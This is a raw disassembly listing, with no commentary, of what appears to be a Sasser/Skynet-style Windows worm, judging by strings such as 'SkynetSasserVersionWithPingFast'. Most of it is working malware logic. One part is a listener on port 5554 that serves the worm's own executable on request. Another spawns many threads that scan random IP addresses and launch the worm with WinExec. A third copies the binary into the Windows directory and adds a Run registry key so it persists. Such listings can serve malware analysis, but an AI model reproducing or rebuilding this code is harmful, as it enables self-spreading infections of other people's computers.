push eax
push off_4068E0
jmp loc_401E15
; ---------------------------------------------------------------------------
loc_401CE2: ; CODE XREF: sub_401B46+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz loc_401E1A
push 0
push off_4068E4
call sub_4022B0
pop ecx
push eax
push off_4068E4
push ebx
call esi ; dword_405104
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DF7
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call dword_405108
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_40510C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DF7
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call dword_405110
cmp eax, 0FFFFFFFFh
jnz short loc_401D82
push ebx
call dword_405114
jmp short loc_401DF7
; ---------------------------------------------------------------------------
loc_401D82: ; CODE XREF: sub_401B46+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DF7
lea eax, [ebp+var_2]
push offset dword_406F48
push eax
call sub_4027C0
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DCC: ; CODE XREF: sub_401B46+2A6�j
call ebx ; dword_40502C
cmp eax, 1
jnz short loc_401DEE
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_405104
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DCC
; ---------------------------------------------------------------------------
loc_401DEE: ; CODE XREF: sub_401B46+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
loc_401DF7: ; CODE XREF: sub_401B46+1DD�j
; sub_401B46+21B�j ...
push [ebp+var_C]
call dword_405114
push 0
push off_4068DC
call sub_4022B0
pop ecx
push eax
push off_4068DC
loc_401E15: ; CODE XREF: sub_401B46+197�j
push [ebp+arg_0]
jmp short loc_401E50
; ---------------------------------------------------------------------------
loc_401E1A: ; CODE XREF: sub_401B46+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401E3A
push ebx
call dword_405114
jmp short loc_401E52
; ---------------------------------------------------------------------------
loc_401E3A: ; CODE XREF: sub_401B46+2E9�j
push 0
push off_4068DC
call sub_4022B0
pop ecx
push eax
push off_4068DC
loc_401E4F: ; CODE XREF: sub_401B46+8A�j
; sub_401B46+BB�j
push ebx
loc_401E50: ; CODE XREF: sub_401B46+2D2�j
call esi ; dword_405104
loc_401E52: ; CODE XREF: sub_401B46+2F2�j
cmp [ebp+var_10], 0
jg loc_401B81
push [ebp+arg_0]
call dword_405114
pop edi
pop esi
loc_401E67: ; CODE XREF: sub_401B46+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B46 endp
; =============== S U B R O U T I N E =======================================
sub_401E6E proc near ; CODE XREF: sub_401B46+119�p
; sub_401B46+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E76: ; CODE XREF: sub_401E6E+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E80
cmp al, 9
jnz short loc_401E83
loc_401E80: ; CODE XREF: sub_401E6E+C�j
inc esi
jmp short loc_401E76
; ---------------------------------------------------------------------------
loc_401E83: ; CODE XREF: sub_401E6E+10�j
; sub_401E6E+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_4028B0
test eax, eax
pop ecx
jz short loc_401E9E
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E83
; ---------------------------------------------------------------------------
loc_401E9E: ; CODE XREF: sub_401E6E+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EA3 proc near ; DATA XREF: sub_4020C8+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_40510C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EC7
loc_401EBF: ; CODE XREF: sub_401EA3+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EC7: ; CODE XREF: sub_401EA3+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_405108
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_4050F4
cmp eax, 0FFFFFFFFh
jz short loc_401EFF
push 5
push edi
call dword_4050F8
cmp eax, 0FFFFFFFFh
jnz short loc_401F08
loc_401EFF: ; CODE XREF: sub_401EA3+4C�j
push edi
call dword_405114
jmp short loc_401EBF
; ---------------------------------------------------------------------------
loc_401F08: ; CODE XREF: sub_401EA3+5A�j
; sub_401EA3+89�j
push esi
push esi
push edi
call dword_4050FC
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B46
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_405028 ; Sleep
jmp short loc_401F08
sub_401EA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F2E proc near ; DATA XREF: sub_4020C8+8D�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 45Ch
push ebx
mov ebx, dword_4050E0
push ebp
push esi
push edi
mov esi, 0FFh
mov ebp, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401F48: ; CODE XREF: sub_401F2E+195�j
and [esp+46Ch+var_458], 0
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8
test eax, eax
jz loc_4020BB
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405120
movsx edi, al
movsx eax, ah
test edi, edi
mov [esp+46Ch+var_45C], eax
jge short loc_401F8C
add edi, 100h
loc_401F8C: ; CODE XREF: sub_401F2E+56�j
cmp [esp+46Ch+var_45C], 0
jge short loc_401F9B
add [esp+46Ch+var_45C], 100h
loc_401F9B: ; CODE XREF: sub_401F2E+63�j
; sub_401F2E+187�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FFB
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FDE
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401FF8
; ---------------------------------------------------------------------------
loc_401FDE: ; CODE XREF: sub_401F2E+8B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_401FF8: ; CODE XREF: sub_401F2E+AE�j
push edi
jmp short loc_402027
; ---------------------------------------------------------------------------
loc_401FFB: ; CODE XREF: sub_401F2E+7B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402027: ; CODE XREF: sub_401F2E+CB�j
lea eax, [esp+47Ch+var_454]
push ebp
push eax
call ebx ; dword_4050E0
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405120
push eax
call sub_401B08
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40209E
lea eax, [esp+46Ch+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40209E
lea eax, [esp+46Ch+var_400]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [esp+46Ch+var_400]
push offset asc_406A78 ; " "
push eax
call sub_4027D0
lea eax, [esp+474h+var_454]
push eax
lea eax, [esp+478h+var_400]
push eax
call sub_4027D0
add esp, 10h
lea eax, [esp+46Ch+var_400]
push 0
push eax
call dword_40503C ; WinExec
loc_40209E: ; CODE XREF: sub_401F2E+11F�j
; sub_401F2E+12E�j
push 19h
call dword_405028 ; Sleep
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8
test eax, eax
jnz loc_401F9B
loc_4020BB: ; CODE XREF: sub_401F2E+2E�j
push 19h
call dword_405028 ; Sleep
jmp loc_401F48
sub_401F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C8 proc near ; CODE XREF: .text:004029A7�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; dword_405048
call dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_4022B0
pop ecx
test eax, eax
pop ecx
jbe short loc_402111
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40210B: ; CODE XREF: sub_4020C8+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402111: ; CODE XREF: sub_4020C8+35�j
push 1
call sub_402176
mov [esp+14h+var_14], offset aSkynetsasserve ; "SkynetSasserVersionWithPingFast"
push esi
push esi
call edi ; dword_405048
call dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402134
xor eax, eax
jmp short loc_40210B
; ---------------------------------------------------------------------------
loc_402134: ; CODE XREF: sub_4020C8+66�j
mov edi, dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EA3
push esi
push esi
call edi ; dword_405038
mov ebx, 80h
loc_40214F: ; CODE XREF: sub_4020C8+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F2E
push esi
push esi
call edi ; dword_405038
dec ebx
jnz short loc_40214F
pop ebx
loc_402162: ; CODE XREF: sub_4020C8+AC�j
push esi
call dword_40500C
push 0BB8h
call dword_405028 ; Sleep
jmp short loc_402162
sub_4020C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402176 proc near ; CODE XREF: sub_4020C8+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_4022B0
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_4021CE
lea eax, [ebp+var_424]
push offset asc_406AD4 ; "\\"
push eax
call sub_4027D0
pop ecx
pop ecx
loc_4021CE: ; CODE XREF: sub_402176+43�j
push off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_4027D0
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_4021FE
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_40504C ; CopyFileA
loc_4021FE: ; CODE XREF: sub_402176+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405000
lea eax, [ebp+var_424]
push eax
call sub_4022B0
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004
push [ebp+var_4]
call dword_405008
leave
retn
sub_402176 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402250 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4022A3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_402297
neg ecx
and ecx, 3
jz short loc_402279
sub edx, ecx
loc_402273: ; CODE XREF: sub_402250+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_402273
loc_402279: ; CODE XREF: sub_402250+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_402297
rep stosd
test edx, edx
jz short loc_40229D
loc_402297: ; CODE XREF: sub_402250+18�j
; sub_402250+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_402297
loc_40229D: ; CODE XREF: sub_402250+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4022A3: ; CODE XREF: sub_402250+A�j
mov eax, [esp+arg_0]
retn
sub_402250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022B0 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4022D0
loc_4022BC: ; CODE XREF: sub_4022B0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402303
test ecx, 3
jnz short loc_4022BC
add eax, 0
loc_4022D0: ; CODE XREF: sub_4022B0+A�j
; sub_4022B0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4022D0
mov eax, [ecx-4]
test al, al
jz short loc_402321
test ah, ah
jz short loc_402317
test eax, 0FF0000h
jz short loc_40230D
test eax, 0FF000000h
jz short loc_402303
jmp short loc_4022D0
; ---------------------------------------------------------------------------
loc_402303: ; CODE XREF: sub_4022B0+11�j
; sub_4022B0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40230D: ; CODE XREF: sub_4022B0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402317: ; CODE XREF: sub_4022B0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402321: ; CODE XREF: sub_4022B0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4022B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402330 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_402350
cmp edi, eax
jb loc_4024C8
loc_402350: ; CODE XREF: sub_402330+16�j
test edi, 3
jnz short loc_40236C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
loc_40236C: ; CODE XREF: sub_402330+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_402384
and eax, 3
add ecx, eax
jmp dword ptr loc_40238C+4[eax*4]
; ---------------------------------------------------------------------------
loc_402384: ; CODE XREF: sub_402330+46�j
jmp dword ptr loc_402488[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40238C: ; CODE XREF: sub_402330+31�j
; sub_402330+8E�j ...
jmp off_40240C[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov al, ds:0CC004023h
and eax, [eax+0]
lock and eax, [eax+0]
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40240C dd offset loc_40246F ; DATA XREF: sub_402330:loc_40238C�r
dd offset loc_40245C
dd offset loc_402454
dd offset loc_40244C
dd offset loc_402444
dd offset loc_40243C
dd offset loc_402434
dd offset loc_40242C
; ---------------------------------------------------------------------------
loc_40242C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402434: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40243C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_402444: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40244C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_402454: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40245C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40246F: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330:off_40240C�o
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
off_402478 dd offset loc_402488 ; DATA XREF: sub_402330+35�r
; sub_402330+92�r ...
dd offset loc_402490
dd offset loc_40249C
dd offset loc_4024B0
; ---------------------------------------------------------------------------
loc_402488: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402490: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40249C: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4024B0: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4024C8: ; CODE XREF: sub_402330+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4024FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4024F0: ; CODE XREF: sub_402330+1B1�j
; sub_402330+208�j ...
neg ecx
jmp off_4025C0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4024FC: ; CODE XREF: sub_402330+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402514
and eax, 3
sub ecx, eax
jmp dword ptr loc_402514+4[eax*4]
; ---------------------------------------------------------------------------
loc_402514: ; CODE XREF: sub_402330+1D6�j
; DATA XREF: sub_402330+1DD�r
jmp off_402610[ecx*4]
; ---------------------------------------------------------------------------
align 4
sub ds:25480040h, ah
inc eax
add [eax+25h], dh
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4025C4
dd offset loc_4025CC
dd offset loc_4025D4
dd offset loc_4025DC
dd offset loc_4025E4
dd offset loc_4025EC
dd offset loc_4025F4
off_4025C0 dd offset loc_402607 ; DATA XREF: sub_402330+1C2�r
; ---------------------------------------------------------------------------
loc_4025C4: ; DATA XREF: sub_402330+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4025CC: ; DATA XREF: sub_402330+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4025D4: ; DATA XREF: sub_402330+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4025DC: ; DATA XREF: sub_402330+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4025E4: ; DATA XREF: sub_402330+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4025EC: ; DATA XREF: sub_402330+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4025F4: ; DATA XREF: sub_402330+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402607: ; CODE XREF: sub_402330+1C2�j
; DATA XREF: sub_402330:off_4025C0�o
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402610 dd offset loc_402620 ; DATA XREF: sub_402330+1B7�r
; sub_402330:loc_402514�r ...
dd offset loc_402628
dd offset loc_402638
dd offset loc_40264C
; ---------------------------------------------------------------------------
loc_402620: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402628: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402638: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40264C: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402670 proc near ; CODE XREF: sub_40159E+8�p
; sub_4037BC+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_402690
loc_40267C: ; CODE XREF: sub_402670+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40267C
loc_402690: ; CODE XREF: sub_402670+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_402670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40271A
mov dh, [ecx+1]
test dh, dh
jz short loc_402707
loc_4026B8: ; CODE XREF: sub_4026A0+52�j
; sub_4026A0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4026DA
test al, al
jz short loc_4026D4
loc_4026C9: ; CODE XREF: sub_4026A0+32�j
mov al, [esi]
inc esi
loc_4026CC: ; CODE XREF: sub_4026A0+3F�j
cmp al, dl
jz short loc_4026DA
test al, al
jnz short loc_4026C9
loc_4026D4: ; CODE XREF: sub_4026A0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4026DA: ; CODE XREF: sub_4026A0+23�j
; sub_4026A0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4026CC
lea edi, [esi-1]
loc_4026E4: ; CODE XREF: sub_4026A0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402713
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4026B8
mov al, [ecx+3]
test al, al
jz short loc_402713
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4026E4
jmp short loc_4026B8
; ---------------------------------------------------------------------------
loc_402707: ; CODE XREF: sub_4026A0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402A36
; ---------------------------------------------------------------------------
loc_402713: ; CODE XREF: sub_4026A0+49�j
; sub_4026A0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_4026A0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4026A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402720 proc near ; CODE XREF: sub_401B46+103�p
; sub_401B46+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402739: ; CODE XREF: sub_402720+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402739
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_402761
mov edx, dword_406F4C
loc_402761: ; CODE XREF: sub_402720+39�j
; sub_402720+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_402781
test al, al
jz short loc_402781
inc edx
jmp short loc_402761
; ---------------------------------------------------------------------------
loc_402781: ; CODE XREF: sub_402720+58�j
; sub_402720+5C�j
mov ebx, edx
loc_402783: ; CODE XREF: sub_402720+81�j
mov al, [edx]
test al, al
jz short loc_4027A7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4027A3
inc edx
jmp short loc_402783
; ---------------------------------------------------------------------------
loc_4027A3: ; CODE XREF: sub_402720+7E�j
and byte ptr [edx], 0
inc edx
loc_4027A7: ; CODE XREF: sub_402720+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_406F4C, edx
and eax, ebx
pop ebx
leave
retn
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027C0 proc near ; CODE XREF: sub_401B46+E9�p
; sub_401B46+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402831
sub_4027C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027D0 proc near ; CODE XREF: sub_401F2E+14C�p
; sub_401F2E+15B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4027EC
